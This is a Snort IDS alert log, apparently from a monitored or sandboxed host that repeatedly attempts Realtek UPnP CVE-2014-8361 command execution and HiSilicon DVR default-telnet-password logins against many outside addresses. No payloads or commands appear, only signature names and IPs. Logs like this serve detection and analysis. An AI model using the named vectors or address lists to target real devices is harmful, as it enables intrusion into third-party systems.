Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:41214
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42686 -> 45.207.218.95:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42686 -> 45.207.218.95:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55844 -> 45.252.63.15:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55844 -> 45.252.63.15:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:49046
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33660 -> 91.79.26.179:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33660 -> 91.79.26.179:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33674 -> 91.79.26.179:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44360
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:41234
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:41234
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37750 -> 45.42.81.81:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37750 -> 45.42.81.81:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:49102
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:47890
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:47890
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59058
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59094
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60916 -> 185.71.65.181:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60916 -> 185.71.65.181:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60920 -> 185.71.65.181:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37530 -> 91.78.54.83:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37530 -> 91.78.54.83:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37534 -> 91.78.54.83:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:41274
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:41274
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59108
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:49102
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59122
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41570 -> 45.138.71.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41570 -> 45.138.71.9:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59130
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:49168
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 161.216.22.60:23 -> 192.168.2.23:41316
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 161.216.22.60:23 -> 192.168.2.23:41316
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59148
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44458
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59156
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59160
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:49168
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59166
Source: Traffic	Snort IDS: 716 INFO TELNET access 194.246.105.107:23 -> 192.168.2.23:57896
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60688 -> 45.195.156.92:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60688 -> 45.195.156.92:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 175.214.195.36:23 -> 192.168.2.23:59170
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41104 -> 45.138.69.49:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41104 -> 45.138.69.49:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37460 -> 45.123.199.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37460 -> 45.123.199.154:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:49210
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51612 -> 45.115.241.185:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51612 -> 45.115.241.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34806 -> 45.33.246.95:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34806 -> 45.33.246.95:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48016
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48016
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:49210
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44522
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36610 -> 45.207.220.107:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36610 -> 45.207.220.107:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55508 -> 45.158.23.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55508 -> 45.158.23.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36622 -> 45.207.220.107:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 203.90.227.124:23 -> 192.168.2.23:49258
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49258 -> 203.90.227.124:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 203.90.227.124:23 -> 192.168.2.23:49258
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54120 -> 91.77.116.237:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54120 -> 91.77.116.237:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54122 -> 91.77.116.237:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 223.205.58.195:23 -> 192.168.2.23:33132
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:48124 -> 203.210.221.136:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43020 -> 185.235.181.147:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43020 -> 185.235.181.147:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43056 -> 185.235.181.147:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34552 -> 45.121.57.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34552 -> 45.121.57.9:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48124
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48124
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36114 -> 91.78.174.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36114 -> 91.78.174.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36116 -> 91.78.174.109:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.157.127.2:23 -> 192.168.2.23:44616
Source: Traffic	Snort IDS: 716 INFO TELNET access 210.223.80.230:23 -> 192.168.2.23:42282
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33154 -> 91.78.141.229:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33154 -> 91.78.141.229:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33158 -> 91.78.141.229:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56558 -> 185.225.193.253:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56558 -> 185.225.193.253:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56564 -> 185.225.193.253:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.181.82.104:23 -> 192.168.2.23:43658
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.181.82.104:23 -> 192.168.2.23:43658
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59714 -> 91.77.198.25:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59714 -> 91.77.198.25:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59728 -> 91.77.198.25:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 194.246.105.107:23 -> 192.168.2.23:58194
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48286
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48286
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43164 -> 91.77.245.231:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43164 -> 91.77.245.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43168 -> 91.77.245.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59090 -> 45.43.238.115:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59090 -> 45.43.238.115:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51002 -> 45.41.87.61:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51002 -> 45.41.87.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59556 -> 45.120.78.199:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59556 -> 45.120.78.199:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52210 -> 185.216.248.85:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52210 -> 185.216.248.85:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46818 -> 45.207.63.180:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46818 -> 45.207.63.180:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47336 -> 45.79.155.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47336 -> 45.79.155.9:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47362 -> 45.79.155.9:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37646 -> 45.81.128.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37646 -> 45.81.128.160:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48450 -> 45.248.68.214:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48450 -> 45.248.68.214:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53392 -> 185.131.78.245:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53392 -> 185.131.78.245:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37656 -> 45.81.128.160:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53400 -> 185.131.78.245:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49368 -> 45.115.230.164:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49368 -> 45.115.230.164:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56470 -> 45.33.251.24:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56470 -> 45.33.251.24:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 185.3.215.3:23 -> 192.168.2.23:44774
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60092 -> 45.125.108.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60092 -> 45.125.108.154:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49666 -> 185.154.168.220:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49666 -> 185.154.168.220:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41754 -> 45.41.82.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41754 -> 45.41.82.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49674 -> 185.154.168.220:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48408
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48408
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59070 -> 45.127.162.12:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59070 -> 45.127.162.12:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 210.223.80.230:23 -> 192.168.2.23:42656
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41752 -> 91.78.156.230:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41752 -> 91.78.156.230:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41754 -> 91.78.156.230:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:44050 -> 27.33.32.237:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55674 -> 45.117.146.6:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55674 -> 45.117.146.6:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47894 -> 185.131.77.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47894 -> 185.131.77.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47902 -> 185.131.77.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34420 -> 45.207.220.202:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34420 -> 45.207.220.202:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34432 -> 45.207.220.202:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45430 -> 45.42.87.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45430 -> 45.42.87.86:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48566
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48566
Source: Traffic	Snort IDS: 716 INFO TELNET access 194.246.105.107:23 -> 192.168.2.23:58524
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53156 -> 45.43.230.94:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53156 -> 45.43.230.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40222 -> 45.115.242.84:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40222 -> 45.115.242.84:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56140 -> 45.138.68.28:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56140 -> 45.138.68.28:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 176.107.91.35:23 -> 192.168.2.23:60616
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47924 -> 190.13.92.59:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58062 -> 187.218.78.145:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35488 -> 45.60.186.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35488 -> 45.60.186.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60294 -> 45.134.145.89:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60294 -> 45.134.145.89:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45034 -> 45.43.224.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45034 -> 45.43.224.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35494 -> 45.60.186.108:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 203.210.221.136:23 -> 192.168.2.23:48686
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 203.210.221.136:23 -> 192.168.2.23:48686
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.181.82.104:23 -> 192.168.2.23:44152
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.181.82.104:23 -> 192.168.2.23:44152
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.40.62.194:23 -> 192.168.2.23:40692
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55872 -> 45.195.68.113:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55872 -> 45.195.68.113:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38934 -> 45.120.109.78:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38934 -> 45.120.109.78:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38938 -> 45.120.109.78:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46248 -> 91.200.122.127:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51764 -> 45.33.244.124:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51764 -> 45.33.244.124:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 185.3.215.3:23 -> 192.168.2.23:45140
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46148 -> 91.220.244.184:52869
